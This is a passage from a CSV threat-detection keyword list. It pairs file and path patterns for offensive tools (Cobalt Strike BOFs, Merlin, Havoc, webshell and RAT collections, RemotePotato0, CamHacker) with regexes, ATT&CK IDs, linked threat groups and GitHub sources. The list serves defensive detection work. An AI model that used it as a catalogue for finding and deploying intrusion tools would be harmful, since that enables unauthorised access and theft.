"*/releases/latest/download/cloudflared-darwin-amd64.tgz*",".{0,1000}\/releases\/latest\/download\/cloudflared\-darwin\-amd64\.tgz.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","#linux","N/A","10","","N/A","","","","10350" "*/releases/latest/download/lse.sh*",".{0,1000}\/releases\/latest\/download\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","10351" "*/remot shell.pl*",".{0,1000}\/remot\sshell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","10355" "*/Remote/adcs_request/*",".{0,1000}\/Remote\/adcs_request\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10357" "*/Remote/office_tokens/*",".{0,1000}\/Remote\/office_tokens\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10358" "*/Remote/procdump/*",".{0,1000}\/Remote\/procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10359" "*/Remote/ProcessDestroy/*",".{0,1000}\/Remote\/ProcessDestroy\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10360" "*/Remote/ProcessListHandles/*",".{0,1000}\/Remote\/ProcessListHandles\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10361" "*/Remote/schtaskscreate/*",".{0,1000}\/Remote\/schtaskscreate\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike 
injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10362" "*/Remote/schtasksrun/*",".{0,1000}\/Remote\/schtasksrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10363" "*/Remote/setuserpass/",".{0,1000}\/Remote\/setuserpass\/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10364" "*/Remote/setuserpass/*",".{0,1000}\/Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10365" "*/Remote/unexpireuser/*",".{0,1000}\/Remote\/unexpireuser\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - 
Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10366" "*/RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\/RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","10367" "*/Remote-administration-tools-archive.git*",".{0,1000}\/Remote\-administration\-tools\-archive\.git.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10368" "*/remotedesktop.exe*",".{0,1000}\/remotedesktop\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10371" "*/RemoteHashRetrieval.ps1*",".{0,1000}\/RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a 
Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","10372" "*/RemoteKrbRelay.git*",".{0,1000}\/RemoteKrbRelay\.git.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","1","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","10378" "*/RemoteMaintsvc.exe*",".{0,1000}\/RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","10379" "*/RemoteMaintsvc.exe*",".{0,1000}\/RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","10380" "*/remote-method-guesser.git*",".{0,1000}\/remote\-method\-guesser\.git.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security 
vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","10381" "*/RemoteOps.py*",".{0,1000}\/RemoteOps\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","10383" "*/RemotePenetration.exe*",".{0,1000}\/RemotePenetration\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10396" "*/RemotePotato0.git*",".{0,1000}\/RemotePotato0\.git.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","10397" "*/RemotePotato0.zip*",".{0,1000}\/RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","10398" "*/remotereg.c*",".{0,1000}\/remotereg\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","10399" "*/remotereg.o*",".{0,1000}\/remotereg\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - 